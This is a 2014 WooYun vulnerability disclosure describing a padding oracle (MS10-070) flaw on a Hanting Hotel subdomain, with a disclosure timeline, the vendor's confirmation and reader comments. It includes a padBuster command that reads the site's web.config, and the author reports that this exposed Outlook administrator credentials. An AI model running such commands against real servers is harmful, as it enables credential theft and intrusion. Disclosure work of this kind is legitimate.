当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050255

漏洞标题:汉庭酒店某分站从padding oracle到outlook管理员权限

相关厂商:汉庭酒店

漏洞作者: magerx

提交时间:2014-02-04 10:36

修复时间:2014-03-21 10:37

公开时间:2014-03-21 10:37

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-04: 细节已通知厂商并且等待厂商处理中
2014-02-08: 厂商已经确认,细节仅向厂商公开
2014-02-18: 细节向核心白帽子及相关领域专家公开
2014-02-28: 细节向普通白帽子公开
2014-03-10: 细节向实习白帽子公开
2014-03-21: 细节向公众公开

简要描述:

存在padding oracle(MS10-070)漏洞

详细说明:

漏洞URL:

http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNr******2&t=634********


1.padBuster测试读取web.config:

perl padBuster.pl http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNrCvsOavmQ2 Ge****yY_JNrCvsOavmQ2 16 -encoding 3 -plaintext "|||~/Web.config"


test1.jpg


2.jpg


test3.jpg


1.jpg


Result:

http://hters.htinns.com/HTERS/ScriptResource.axd?d=pIn6KUKoUCvN15ROF5KiVDwb87TWlbfzq78**********AAAAAAA0


2.读取web.config内容:

2.jpg


3.根据web.config配置信息,进一步利用...

1.jpg


获得mail服务器outlook认证用户和密码

outlook.png


4.仅通过读取web.config体现漏洞存在,不做进一步测试...

漏洞证明:

1.jpg


2.jpg


outlook.png

修复方案:

打补丁尽快修复吧,同时口令也太弱了

版权声明:转载请注明来源 magerx@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-02-08 15:29

厂商回复:

感谢关注!已转送相关团队进行跟进,谢谢!

最新状态:

2014-02-26:2014-02-26:漏洞已关闭,谢谢!


漏洞评价:

评论

  1. 2014-02-08 15:47 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    这个跟进一下

  2. 2014-02-28 16:36 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    好吧,运气真好,这漏洞我就没碰到成功过

  3. 2014-03-02 16:54 | pangshenjie ( 普通白帽子 | Rank:110 漏洞数:14 )

    @hacker@sina.cn 没成功过+1

  4. 2014-03-29 22:36 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    @magerx 很专业!